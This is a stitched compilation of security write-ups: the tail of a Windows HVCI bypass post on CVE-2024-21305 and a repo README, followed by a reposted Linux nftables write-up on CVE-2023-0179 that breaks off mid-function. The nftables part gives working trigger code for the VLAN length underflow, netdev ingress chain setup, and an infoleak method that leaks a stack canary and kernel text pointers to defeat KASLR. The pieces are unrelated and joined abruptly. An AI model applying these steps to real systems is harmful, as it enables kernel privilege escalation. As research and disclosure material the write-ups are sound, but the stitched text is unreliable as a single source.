The architecture defines that any IOMMU present in the system must be detected by the BIOS and announced via an ACPI table, called DMA Remapping Reporting (DMAR). The DMAR is composed of multiple remapping structures. For example, an IOMMU is reported with the DMA Remapping Hardware Unit Definition (DRHD) structure. Describing all of them is beyond the scope of this article.

What if a device always needs to perform DMA transfers to specific memory regions? Certain devices, like the network controller when used for debugging (for example in KDNET), or the USB controller when used for legacy keyboard emulation in the BIOS, should always be able to perform DMA, both before and after the IOMMU is set up. For these kinds of devices, the Reserved Memory Region Reporting (RMRR) structure is used by the BIOS to describe regions of memory where DMA should always be possible.

Two important concepts described in the Intel manual regarding the RMRR structure:

  1. The BIOS should report physical memory described in the RMRR as Reserved in the UEFI memory map.
  2. When the OS enables DMA remapping, it should set up the Second-stage address translation structures for mapping the physical memory described by the RMRR using the “identity mapping” with read and write (RW) permission (meaning that GPA X is mapped to HPA X).

Interaction with Windows, and the bug

In some buggy machines, requirement #1 was not met, meaning that neither the HV nor the Secure Kernel learns about this memory range from the UEFI memory map.

When booting, the Hypervisor initializes its internal state, creates the root partition (again, details are in the Windows Internals book) and performs the IOMMU initialization in multiple phases. On AMD64 machines, one of these phases requires parsing the RMRR. Note that at this point the HV still has no idea whether the system will enable VBS/HVCI or not, so it has no option other than applying the full identity mapping to the range (which implies RWX protection).

When the Secure Kernel later starts and determines that HVCI should be enabled, it will set the new “default VTL permission” to be RW (but not Execute) and will inform the hypervisor by setting the public HvRegisterVsmPartitionConfig synthetic MSR (documented in the Hypervisor TLFS). Writing HvRegisterVsmPartitionConfig from VTL 1 of the target partition causes a VMEXIT to the Hypervisor, which cycles through each valid guest physical frame described in the UEFI memory map and mapped in the VTL 0 SLAT, removing the “Execute” permission bit (as dictated by the “DefaultVtlProtectionMask” field of the synthetic register).

Mindful readers can already see what is going wrong here. On buggy firmware, where the RMRR region is absent from the UEFI memory map, the Hypervisor leaves the “Execute” protection of the described region enabled, producing an HVCI violation (thanks Satoshi).

Fixes

MSFT fixed the issue (thanks Andrea) by working on two separate fronts:

  1. Fixing the firmware in all the commercial devices MSFT released, forcing the RMRR memory region to be included in the UEFI memory map
  2. Implementing a trick in the HV. Since the architecture requires the RMRR memory region to be mapped in the IOMMU (via the Hierarchical Address Translation structures described above) using an identity map with RW access permission (but no X, Execute), we decided to run some compatibility tests and see what happens if the HV protects all the initial PFNs of the RMRR memory regions in the SLAT by stripping the X bit. Indeed, the OS only ever needs to read from or write to those regions, so programming the SLAT this way is enough.

Tests for fix #2 worked and produced almost zero compatibility issues, so MSFT also decided to remove the X permission on all RMRR memory regions by default on ALL systems, increasing the protection even when the firmware is buggy.

Summary

Hope you enjoyed this jointly written post, with both the bug reporter’s and the developer’s perspectives, and a great deal of detail on the interaction of VT-d and Hyper-V by Andrea.

To summarize, the combination of buggy UEFI firmware that did not follow one of the requirements of the Intel VT-d specification and a permissive default EPT configuration caused unintended RWX GPAs under HVCI. MSFT resolved the issue by correcting the default permission and their UEFI firmware, and released the fix on January 9. Not all devices are vulnerable to this issue. However, you may identify vulnerable devices by checking whether the memmap UEFI shell command fails to show the exact RMRR memory regions as Reserved.

This repo contains the report and PoC of CVE-2024-21305, the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability. This vulnerability allowed arbitrary kernel-mode code execution, effectively bypassing HVCI, within the root partition. For the root cause, read the blog post coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.

The report in this repo is what I sent to MSRC, which contains the PoC and an initial analysis of the issue.

CVE-2024-21305

64 bytes and a ROP chain – A journey through nftables


Original text by Davide Ornaghi

The purpose of this article is to dive into the process of vulnerability research in the Linux kernel through my experience that led to the finding of CVE-2023-0179 and a fully functional Local Privilege Escalation (LPE).
By the end of this post, the reader should be more comfortable interacting with the nftables component and approaching the new mitigations encountered while exploiting the kernel stack from the network context.

1. Context

As a fresh X user indefinitely scrolling through my feed, one day I noticed a tweet about a Netfilter Use-after-Free vulnerability. Not being at all familiar with Linux exploitation, I couldn’t understand much at first, but it reminded me of some concepts I used to study for my thesis, such as kalloc zones and mach_msg spraying on iOS, which got me curious enough to explore even more writeups.

A couple of CVEs later I started noticing an emerging (and perhaps worrying) pattern: Netfilter bugs had been significantly increasing in the last months.

During my initial reads I ran into an awesome article from David Bouman titled How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables describing the internals of nftables, a Netfilter component and newer version of iptables, in great depth. By the way, I highly suggest reading Sections 1 through 3 to become familiar with the terminology before continuing.

As the subsystem internals made more sense, I started appreciating Linux kernel exploitation more and more, and decided to give myself the challenge to look for a new CVE in the nftables system in a relatively short timeframe.

2. Key aspects of nftables

Touching on the most relevant concepts of nftables, it’s worth introducing only the key elements:

  • NFT tables define the traffic class to be processed (IP(v6), ARP, BRIDGE, NETDEV);
  • NFT chains define at what point in the network path to process traffic (before/after/while routing);
  • NFT rules define lists of expressions that decide whether to accept traffic or drop it.

In programming terms, rules can be seen as instructions and expressions are the single statements that compose them. Expressions can be of different types, and they’re collected inside the net/netfilter directory of the Linux tree, each file starting with the “nft_” prefix.
Each expression has a function table that groups several functions to be executed at a particular point in the workflow, the most important ones being .init, invoked when the rule is created, and .eval, called at runtime during rule evaluation.

Since rules and expressions can be chained together to reach a unique verdict, they have to store their state somewhere. NFT registers are temporary memory locations used to store such data.
For instance, nft_immediate stores a user-controlled immediate value into an arbitrary register, while nft_payload extracts data directly from the received socket buffer.
Registers can be referenced with a 4-byte granularity (NFT_REG32_00 through NFT_REG32_15) or with the legacy option of 16 bytes each (NFT_REG_1 through NFT_REG_4).

But what do tables, chains and rules actually look like from userland?

# nft list ruleset
table inet my_table {
  chain my_chain {
    type filter hook input priority filter; policy drop;
    tcp dport http accept
  }
}

This specific table monitors all IPv4 and IPv6 traffic. The only chain present is of the filter type, which must decide whether to keep packets or drop them. It is installed at the input level, where traffic has already been routed to the current host and is looking for the next hop, and the default verdict is to drop the packet if the other rules haven’t concluded otherwise.
The rule above is translated into different expressions that carry out the following tasks:

  1. Save the transport header to a register;
  2. Make sure it’s a TCP header;
  3. Save the TCP destination port to a register;
  4. Emit the NF_ACCEPT verdict if the register contains the value 80 (HTTP port).

Since David’s article already contains all the architectural details, I’ll just move over to the relevant aspects.

2.1 Introducing Sets and Maps

One of the advantages of nftables over iptables is the possibility to match a certain field with multiple values. For instance, if we wanted to only accept traffic directed to the HTTP and HTTPS protocols, we could implement the following rule:

nft add rule ip4 filter input tcp dport {http, https} accept

In this case, HTTP and HTTPS internally belong to an “anonymous set” that carries the same lifetime as the rule bound to it. When a rule is deleted, any associated set is destroyed too.
In order to make a set persistent (aka “named set”), we can just give it a name, type and values:

nft add set filter AllowedProto { type inet_proto\; flags constant\;}
nft add element filter AllowedProto { http, https }

While this type of set is only useful to match against a list/range of values, nftables also provides maps, an evolution of sets behaving like the hash map data structure. One of their use cases, as mentioned in the wiki, is to pick a destination host based on the packet’s destination port:

nft add map nat porttoip  { type inet_service: ipv4_addr\; }
nft add element nat porttoip { 80 : 192.168.1.100, 8888 : 192.168.1.101 }

From a programmer’s point of view, registers are like local variables, only existing in the current chain, and sets/maps are global variables persisting over consecutive chain evaluations.

2.2 Programming with nftables

Finding a potential security issue in the Linux codebase is pointless if we can’t also define a procedure to trigger it and reproduce it quite reliably. That’s why, before digging into the code, I wanted to make sure I had all the necessary tools to programmatically interact with nftables just as if I were sending commands over the terminal.

We already know that we can use the netlink interface to send messages to the subsystem via an AF_NETLINK socket but, if we want to approach nftables at a higher level, the libnftnl project contains several examples showing how to interact with its components: we can thus send create, update and delete requests to all the previously mentioned elements, and libnftnl will take care of the implementation specifics.

For this particular project, I decided to start by examining the CVE-2022-1015 exploit source since it’s based on libnftnl and implements the most repetitive tasks such as building and sending batch requests to the netlink socket. This project also comes with functions to add expressions to rules, at least the most important ones, which makes building rules really handy.

3. Scraping the attack surface

To keep things simple, I decided that I would start by auditing the expression operations, which are invoked at different times in the workflow. Let’s take the nft_payload expression as an example:

static const struct nft_expr_ops nft_payload_ops = {
    .type       = &nft_payload_type,
    .size       = NFT_EXPR_SIZE(sizeof(struct nft_payload)),
    .eval       = nft_payload_eval,
    .init       = nft_payload_init,
    .dump       = nft_payload_dump,
    .reduce     = nft_payload_reduce,
    .offload    = nft_payload_offload,
};

Besides eval and init, which we’ve already touched on, there are a couple other candidates to keep in mind:

  • dump: reads the expression parameters and packs them into an skb. As a read-only operation, it represents an attractive attack surface for infoleaks rather than memory corruptions.
  • reduce: I couldn’t find any reference to this function call, which shied me away from it.
  • offload: adds support for nft_payload expression in case Flowtables are being used with hardware offload. This one definitely adds some complexity and deserves more attention in future research, although specific NIC hardware is required to reach the attack surface.

As my first research target, I ended up sticking with the same ops I started with, init and eval.

3.1 Previous vulnerabilities

We now know where to look for suspicious code, but what are we exactly looking for?
The netfilter bugs I was reading about definitely influenced the vulnerability classes in my scope:

CVE-2022-1015

/* net/netfilter/nf_tables_api.c */

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
    /* We can never read from the verdict register,
     * so bail out if the index is 0,1,2,3 */
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    /* Invalid operation, bail out */
    if (len == 0)
        return -EINVAL;
    /* Integer overflow allows bypassing the check */
    if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data)) 
        return -ERANGE;

    return 0;
}  

int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)
{
    ...
    err = nft_validate_register_load(reg, len);
    if (err < 0)
        return err;
    /* the 8 LSB from reg are written to sreg, which can be used as an index 
     * for read and write operations in some expressions */
    *sreg = reg;
    return 0;
}  

I also had a look at different subsystems, such as TIPC.

CVE-2022-0435

/* net/tipc/monitor.c */

void tipc_mon_rcv(struct net *net, void *data, u16 dlen, u32 addr,
    struct tipc_mon_state *state, int bearer_id)
{
    ...
    struct tipc_mon_domain *arrv_dom = data;
    struct tipc_mon_domain dom_bef;                                   
    ...

    /* doesn't check for maximum new_member_cnt */                      
    if (dlen < dom_rec_len(arrv_dom, 0))                              
        return;
    if (dlen != dom_rec_len(arrv_dom, new_member_cnt))                
        return;
    if (dlen < new_dlen || arrv_dlen != new_dlen)
        return; 
    ...
    /* Drop duplicate unless we are waiting for a probe response */
    if (!more(new_gen, state->peer_gen) && !probing)                  
        return;
    ...

    /* Cache current domain record for later use */
    dom_bef.member_cnt = 0;
    dom = peer->domain;
    /* memcpy with out of bounds domain record */
    if (dom)                                                         
        memcpy(&dom_bef, dom, dom->len);           

A common pattern can be derived from these samples: if we can pass the sanity checks on a certain boundary, either via integer overflow or incorrect logic, then we can reach a write primitive which will write data out of bounds. In other words, typical buffer overflows can still be interesting!

Here is the structure of the ideal vulnerable code chunk: one or more if statements followed by a write instruction such as memcpy, memset, or simply *x = y, inside all the eval and init operations of the net/netfilter/nft_*.c files.

3.2 Spotting a new bug

At this point, I downloaded the latest stable Linux release from The Linux Kernel Archives, which was 6.1.6 at the time, opened it up in my IDE (sadly not vim) and started browsing around.

I initially tried with regular expressions but I soon found it too difficult to exclude the unwanted sources and to match a write primitive with its boundary checks, plus the results were often overwhelming. Thus I moved on to the good old manual auditing strategy.
For context, this is how quickly a regex can become too complex:
if\s*\(\s*(\w+\s*[+\-*/]\s*\w+)\s*(==|!=|>|<|>=|<=)\s*(\w+\s*[+\-*/]\s*\w+)\s*\)\s*\{

It turns out that semantic analysis engines such as CodeQL and Weggli would have done a much better job; I will show how they can be used to search for similar bugs in a later article.

While exploring the nft_payload_eval function, I spotted an interesting occurrence:

/* net/netfilter/nft_payload.c */

switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER:
        if (!skb_mac_header_was_set(skb))
            goto err;
        if (skb_vlan_tag_present(skb)) {
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }

The nft_payload_copy_vlan function is called with two user-controlled parameters: priv->offset and priv->len. Remember that nft_payload’s purpose is to copy data from a particular layer header (IP, TCP, UDP, 802.11…) to an arbitrary register, and the user gets to specify the offset inside the header to copy data from, as well as the size of the copied chunk.

The following code snippet illustrates how to copy the destination address from the IP header to register 0 and compare it against a known value:

int create_filter_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    in_addr_t d_addr;
    d_addr = inet_addr("192.168.123.123");
    rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof d_addr, NFT_REG32_00);
    rule_add_cmp(r, NFT_CMP_EQ, NFT_REG32_00, &d_addr, sizeof d_addr);
    rule_add_immediate_verdict(r, NFT_GOTO, "next_chain");
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

All definitions for the rule_* functions can be found in my Github project.

When I looked at the code under nft_payload_copy_vlan, a frequent C programming pattern caught my eye:

/* net/netfilter/nft_payload.c */

if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
	ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;

memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

These lines determine the size of a memcpy call based on a fairly extended arithmetic operation. I later found out their purpose was to align the skb pointer to the maximum allowed offset, which is the end of the second VLAN tag (at most 2 tags are allowed). VLAN encapsulation is a common technique used by providers to separate customers inside the provider’s network and to transparently route their traffic.

At first I thought I could cause an overflow in the conditional statement, but then I realized that the offset + len expression was being promoted to a uint32_t from uint8_t, making it impossible to reach MAX_INT with 8-bit values:

<+396>:   mov   r11d,DWORD PTR [rbp-0x64]
<+400>:   mov   r10d,DWORD PTR [rbp-0x6c]
gef➤ x/wx $rbp-0x64
0xffffc90000003a0c:   0x00000004
gef➤ x/wx $rbp-0x6c
0xffffc90000003a04:   0x00000013

The compiler treats the two operands as DWORD PTR, hence 32 bits.

After this first disappointment, I started wandering elsewhere, until I came back to the same spot to double check that piece of code which kept looking suspicious.

On the next line, when adjusting the ethlen variable, I noticed that the VLAN header length vlan_hlen (4 bytes) was effectively being subtracted from ethlen instead of being added back to restore the alignment with the second VLAN tag.
By trying all possible offset and len pairs, I could confirm that some of them were actually causing ethlen to underflow, wrapping it back to UINT8_MAX.
With a vulnerability at hand, I documented my findings and promptly sent them to security@kernel.org and the involved distros.
I also accidentally alerted some public mailing lists, such as syzbot’s, which caused a small dispute about whether the issue should be made public immediately via oss-security or not. In the end we managed to release the official patch for the stable tree in a day or two and proceeded with the disclosure process.

How an out-of-bounds copy vulnerability works:

  • OOB write: reading from an accessible memory area and subsequently writing to areas outside the destination buffer;
  • OOB read: reading from a memory area outside the source buffer and writing to readable areas.

The behavior of CVE-2023-0179:

  • Expected scenario: the size of the copy operation “len” is correctly decreased to exclude restricted fields, and saved in “ethlen”;
  • Vulnerable scenario: the value of “ethlen” is decreased below zero and wraps to the maximum value (255), allowing even inaccessible fields to be copied.

4. Reaching the code path

Even the most powerful vulnerability is useless unless it can be triggered, even in a probabilistic manner. Here, we’re inside the evaluation function for the nft_payload expression, which led me to believe that if the code branch was there, then it must be reachable in some way (of course this isn’t always the case).

I’ve already shown how to setup the vulnerable rule, we just have to choose an overflowing offset/length pair like so:

uint8_t offset = 19, len = 4;
struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

Once the rule is in place, we have to force its evaluation by generating some traffic; unfortunately, normal traffic won’t pass through the nft_payload_copy_vlan function, only VLAN-tagged packets will.

4.1 Debugging nftables

From here on, gdb’s assistance proved to be crucial to trace the network paths for input packets.
I chose to spin up a QEMU instance with debugging support, since it’s really easy to feed it your own kernel image and rootfs, and then attach gdb from the host.

When booting from QEMU, it will be more practical to have the kernel modules you need automatically loaded:

# not all configs are required for this bug
CONFIG_VLAN_8021Q=y
CONFIG_VETH=y
CONFIG_BRIDGE=y
CONFIG_BRIDGE_NETFILTER=y
CONFIG_NF_TABLES=y
CONFIG_NF_TABLES_INET=y
CONFIG_NF_TABLES_NETDEV=y
CONFIG_NF_TABLES_IPV4=y
CONFIG_NF_TABLES_ARP=y
CONFIG_NF_TABLES_BRIDGE=y
CONFIG_USER_NS=y
CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"

As for the initial root file system, one with the essential networking utilities can be built for x86_64 (openssh, bridge-utils, nft) by following this guide. Alternatively, syzkaller provides the create-image.sh script which automates the process.
Once everything is ready, QEMU can be run with custom options, for instance:

qemu-system-x86_64 -kernel linuxk/linux-6.1.6/vmlinux -drive format=raw,file=linuxk/buildroot/output/images/rootfs.ext4,if=virtio -nographic -append "root=/dev/vda console=ttyS0" -net nic,model=e1000 -net user,hostfwd=tcp::10022-:22,hostfwd=udp::5556-:1337

This setup allows communicating with the emulated OS via SSH on ports 10022:22 and via UDP on ports 5556:1337. Notice how the host and the emulated NIC are connected indirectly via a virtual hub and aren’t placed on the same segment.
After booting the kernel up, the remote debugger is accessible on local port 1234, hence we can set the required breakpoints:

turtlearm@turtlelinux:~/linuxk/old/linux-6.1.6$ gdb vmlinux
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
...                 
88 commands loaded and 5 functions added for GDB 12.1 in 0.01ms using Python engine 3.10
Reading symbols from vmlinux...               
gef➤  target remote :1234
Remote debugging using :1234
(remote) gef➤  info b
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0xffffffff81c47d50 in nft_payload_eval at net/netfilter/nft_payload.c:133
2       breakpoint     keep y   0xffffffff81c47ebf in nft_payload_copy_vlan at net/netfilter/nft_payload.c:64

Now, hitting breakpoint 2 will confirm that we successfully entered the vulnerable path.

4.2 Main issues

How can I send a packet which definitely enters the correct path? Answering this question was more troublesome than expected.

UDP is definitely easier to handle than TCP, but a UDP socket (SOCK_DGRAM) wouldn’t let me add a VLAN header (layer 2), while using a raw socket was out of the question as it would bypass the network stack, including the NFT hooks.

Instead of crafting my own packets, I just tried configuring a VLAN interface on the ethernet device eth0:

ip link add link eth0 name vlan.10 type vlan id 10
ip addr add 192.168.10.137/24 dev vlan.10
ip link set vlan.10 up

With these commands I could bind a UDP socket to the vlan.10 interface and hope to detect VLAN-tagged packets leaving through eth0. Of course, that wasn’t the case, because the new interface wasn’t holding the necessary routes, and only ARP requests were being produced.

Another attempt involved replicating the physical use case of encapsulated VLANs (Q-in-Q) but in my local network to see what I would receive on the destination host.
Surprisingly, after setting up the same VLAN and subnet on both machines, I managed to emit VLAN-tagged packets from the source host but, no matter how many tags I embedded, they were all being stripped out from the datagram when reaching the destination interface.

This behavior is due to Linux acting as a router. Since a VLAN, being a layer 2 protocol, ends when a router is met, it would be useless for Netfilter to process those tags.

Going back to the kernel source, I was able to spot the exact point where the tag was being stripped out during a process called VLAN offloading, where the NIC driver removes the tag and forwards traffic to the networking stack.

The __netif_receive_skb_core function takes the previously crafted skb and delivers it to the upper protocol layers by calling deliver_skb.
802.1q packets are subject to VLAN offloading here:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc,
				    struct packet_type **ppt_prev)
{
...
if (eth_type_vlan(skb->protocol)) {
	skb = skb_vlan_untag(skb);
	if (unlikely(!skb))
		goto out;
}
...
}

skb_vlan_untag also sets the vlan_tci, vlan_proto, and vlan_present fields of the skb so that the network stack can later fetch the VLAN information if needed.
The function then calls all tap handlers like the protocol sniffers that are listed inside the ptype_all list and finally enters another branch that deals with VLAN packets:

/* net/core/dev.c */

if (skb_vlan_tag_present(skb)) {
	if (pt_prev) {
		ret = deliver_skb(skb, pt_prev, orig_dev);
		pt_prev = NULL;
	}
	if (vlan_do_receive(&skb)) {
		goto another_round;
	}
	else if (unlikely(!skb))
		goto out;
}

The main actor here is vlan_do_receive that actually delivers the 802.1q packet to the appropriate VLAN port. If it finds the appropriate interface, the vlan_present field is reset and another round of __netif_receive_skb_core is performed, this time as an untagged packet with the new device interface.

However, these 3 lines got me curious because they allowed skipping the vlan_present reset and going straight to the IP receive handlers with the 802.1q packet, which is what I needed to reach the nft hooks:

/* net/8021q/vlan_core.c */

vlan_dev = vlan_find_dev(skb->dev, vlan_proto, vlan_id);
if (!vlan_dev)  // if it cannot find vlan dev, go back to netif_receive_skb_core and don't untag
	return false;
...
__vlan_hwaccel_clear_tag(skb); // unset vlan_present flag, making skb_vlan_tag_present false

Remember that the vulnerable code path requires vlan_present to be set (from skb_vlan_tag_present(skb)), so if I sent a packet from a VLAN-aware interface to a VLAN-unaware interface, vlan_do_receive would return false without unsetting the present flag, and that would be perfect in theory.

One more problem arose at this point: the nft_payload_copy_vlan function requires the skb protocol to be either ETH_P_8021AD or ETH_P_8021Q, otherwise vlan_hlen won’t be assigned and the code path won’t be taken:

/* net/netfilter/nft_payload.c */

static bool nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
{
...
if ((skb->protocol == htons(ETH_P_8021AD) ||
	 skb->protocol == htons(ETH_P_8021Q)) &&
	offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
		vlan_hlen += VLAN_HLEN;

Unfortunately, skb_vlan_untag will also reset the inner protocol, making this branch impossible to enter; in the end this path turned out to be a rabbit hole.

While thinking about a different approach I remembered that, since VLAN is a layer 2 protocol, I should have probably turned Ubuntu into a bridge and saved the NFT rules inside the NFPROTO_BRIDGE hooks.
To achieve that, a way to merge the features of a bridge and a VLAN device was needed: enter VLAN filtering!
This feature was introduced in Linux kernel 3.8 and allows using different subnets with multiple guests on a virtualization server (KVM/QEMU) without manually creating VLAN interfaces but only using one bridge.
After creating the bridge, I had to enter promiscuous mode to always reach the NF_BR_LOCAL_IN bridge hook:

/* net/bridge/br_input.c */

static int br_pass_frame_up(struct sk_buff *skb) {
...
	/* Bridge is just like any other port.  Make sure the
	 * packet is allowed except in promisc mode when someone
	 * may be running packet capture.
	 */
	if (!(brdev->flags & IFF_PROMISC) &&
	    !br_allowed_egress(vg, skb)) {
		kfree_skb(skb);
		return NET_RX_DROP;
	}
...
	return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,
		       dev_net(indev), NULL, skb, indev, NULL,
		       br_netif_receive_skb);

and finally enable VLAN filtering to enter the br_handle_vlan function (/net/bridge/br_vlan.c) and avoid any __vlan_hwaccel_clear_tag call inside the bridge module.

sudo ip link set br0 type bridge vlan_filtering 1
sudo ip link set br0 promisc on

While this configuration seemed to work at first, it became unstable after a very short time: once vlan_filtering kicked in, I stopped receiving traffic.

All previous attempts weren’t nearly as reliable as I needed them to be in order to proceed to the exploitation stage. Nevertheless, I learned a lot about the networking stack and the Netfilter implementation.

4.3 The Netfilter Holy Grail

Netfilter hooks

While I could’ve continued looking for ways to stabilize VLAN filtering, I opted for a handier way to trigger the bug.

This chart was taken from the nftables wiki and represents all possible packet flows for each family. The netdev family is of particular interest since its hooks are located at the very beginning, in the Ingress hook.
According to this article the netdev family is attached to a single network interface and sees all network traffic (L2+L3+ARP).
Going back to __netif_receive_skb_core I noticed how the ingress handler was called before vlan_do_receive (which removes the vlan_present flag), meaning that if I could register a NFT hook there, it would have full visibility over the VLAN information:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc, struct packet_type **ppt_prev) {
...
#ifdef CONFIG_NET_INGRESS
...
    if (nf_ingress(skb, &pt_prev, &ret, orig_dev) < 0) // insert hook here
        goto out;
#endif
...
    if (skb_vlan_tag_present(skb)) {
        if (pt_prev) {
            ret = deliver_skb(skb, pt_prev, orig_dev);
            pt_prev = NULL;
        }
        if (vlan_do_receive(&skb)) // delete vlan info
            goto another_round;
        else if (unlikely(!skb))
            goto out;
    }
...

The convenient part is that you don’t even have to receive the actual packets to trigger such hooks because in normal network conditions you will always(?) get the respective ARP requests on broadcast, also carrying the same VLAN tag!

Here’s how to create a base chain belonging to the netdev family:

struct nftnl_chain* c;
c = nftnl_chain_alloc();
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
if (dev_name)
    nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); // set device name
if (base_param) { // set ingress hook number and max priority
    nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
    nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, INT_MIN);
}

And that’s it, you can now send random traffic from a VLAN-aware interface to the chosen network device and the ARP requests will trigger the vulnerable code path.

64 bytes and a ROP chain – A journey through nftables – Part 2

2.1. Getting an infoleak

Can I turn this bug into something useful? At this point I had a rough idea that would allow me to leak some data, although I wasn’t sure what kind of data would come out of the stack.
The idea was to overflow into the first NFT register (NFT_REG32_00) so that all the remaining ones would contain the mysterious data. It also wasn’t clear to me how to extract this leak in the first place, until I remembered the nft_dynset expression from CVE-2022-1015, which inserts key:data pairs into a hashmap-like data structure (actually an nft_set) that can later be fetched from userland. Since we can add registers to the dynset, we can reference them like so:
key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8)
This scheme should avoid duplicate keys, but we still have to check that all key registers contain different values; otherwise, colliding entries would overwrite each other and part of the leak would be lost.
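As a sanity check, the pairing can be simulated in a few lines of Python (a rough sketch; pair_registers is just an illustrative name, not part of the exploit):

```python
NFT_REG32_COUNT = 16  # NFT_REG32_00 .. NFT_REG32_15, 4 bytes each

def pair_registers(regs):
    """Simulate key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8).

    Raises if two key registers collide, since duplicate set keys
    would overwrite each other and part of the leak would be lost.
    """
    assert len(regs) == NFT_REG32_COUNT
    pairs = {}
    for i in range(NFT_REG32_COUNT // 2):
        key, value = regs[i], regs[i + 8]
        if key in pairs:
            raise ValueError(f"duplicate key register: {key:#010x}")
        pairs[key] = value
    return pairs
```

With 16 registers this yields at most 8 elements per overflow, so the whole regs area is recovered in one shot.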

2.1.1 Returning the registers

Having a programmatic way to read the contents of a set would be best in this case. Randorisec accomplished the same task in their CVE-2022-1972 infoleak exploit, where they send a netlink message of the NFT_MSG_GETSET type and parse the received message from an iovec.
Although that technique is the most straightforward one, I went for an easier route that required some (admittedly unnecessary) bash scripting: the nft utility (from the nftables package), which carries out all the parsing for us.

If I wanted to improve this part, I would definitely parse the netlink response without the external dependency of the nft binary, which makes it less elegant and much slower.

After overflowing, we can run the following command to retrieve all elements of the specified map belonging to a netdev table:

$ nft list map netdev {table_name} {set_name}

table netdev mytable {
	map myset12 {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x0 [invalid type] : 0x0 [invalid type],
			     0x5810000 [invalid type] : 0xc9ffff30 [invalid type],
			     0xbccb410 [invalid type] : 0x88ffff10 [invalid type],
			     0x3a000000 [invalid type] : 0xcfc281ff [invalid type],
			     0x596c405f [invalid type] : 0x7c630680 [invalid type],
			     0x78630680 [invalid type] : 0x3d000000 [invalid type],
			     0x88ffff08 [invalid type] : 0xc9ffffe0 [invalid type],
			     0x88ffffe0 [invalid type] : 0xc9ffffa1 [invalid type],
			     0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }
	}
}

2.1.2 Understanding the registers

Seeing all those ffff was already a good sign, but let’s review the different kernel addresses we could run into (this might change due to ASLR and other factors):

  • .TEXT (code) section addresses: 0xffffffff8[1-3]……
  • Stack addresses: 0xffffc9……….
  • Heap addresses: 0xffff8880……..
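To triage the leaked qwords automatically, a quick helper can bucket them against these ranges (a sketch; the ranges are typical x86_64 defaults and may differ with other configs):

```python
def classify_kernel_ptr(addr):
    """Triage a leaked 64-bit value against typical x86_64 kernel ranges."""
    if 0xffffffff81000000 <= addr <= 0xffffffff83ffffff:
        return "text"   # kernel .text (KASLR shifts this window)
    if addr >> 40 == 0xffffc9:
        return "stack"  # vmalloc area, including kernel stacks
    if addr >> 32 == 0xffff8880:
        return "heap"   # direct mapping of physical memory
    return "unknown"
```

Feeding it the dumped set elements quickly separates the interesting pointers from the noise.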

We can ask gdb for a second opinion to see if we actually spotted any of them:

gef➤ p &regs 
$12 = (struct nft_regs *) 0xffffc90000003ae0
gef➤ x/12gx 0xffffc90000003ad3
0xffffc90000003ad3:    0x0ce92fffffc90000    0xffffffffffffff81
0xffffc90000003ae3:    0x071d0000000000ff    0x008105ffff888004
0xffffc90000003af3:    0xb4cc0b5f406c5900    0xffff888006637810    <==
0xffffc90000003b03:    0xffff888006637808    0xffffc90000003ae0    <==
0xffffc90000003b13:    0xffff888006637c30    0xffffc90000003d10
0xffffc90000003b23:    0xffffc90000003ce0    0xffffffff81c2cfa1    <==

Looks like a stack canary is present at address 0xffffc90000003af3, which could be useful later when overwriting one of the saved instruction pointers on the stack. Moreover, we can see an instruction address (0xffffffff81c2cfa1) and a reference to the regs variable itself (0xffffc90000003ae0)!
gdb also tells us that the instruction belongs to the nft_do_chain routine:

gef➤ x/i 0xffffffff81c2cfa1
0xffffffff81c2cfa1 <nft_do_chain+897>:    jmp    0xffffffff81c2cda7 <nft_do_chain+391>

Based on that information, I could use the leaked nft_do_chain address to calculate the KASLR slide: pull the same address out of a KASLR-enabled system and subtract the known static address from it.
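The slide computation itself boils down to one subtraction. A minimal sketch, assuming the static address of the leaked instruction is known from a no-KASLR build of the same kernel:

```python
# Static (no-KASLR) address of the leaked nft_do_chain instruction,
# taken from the debug session above.
NFT_DO_CHAIN_LEAK_STATIC = 0xffffffff81c2cfa1

def kaslr_slide(leaked_addr):
    """slide = leaked runtime address - known static address."""
    return leaked_addr - NFT_DO_CHAIN_LEAK_STATIC

def rebase(static_addr, slide):
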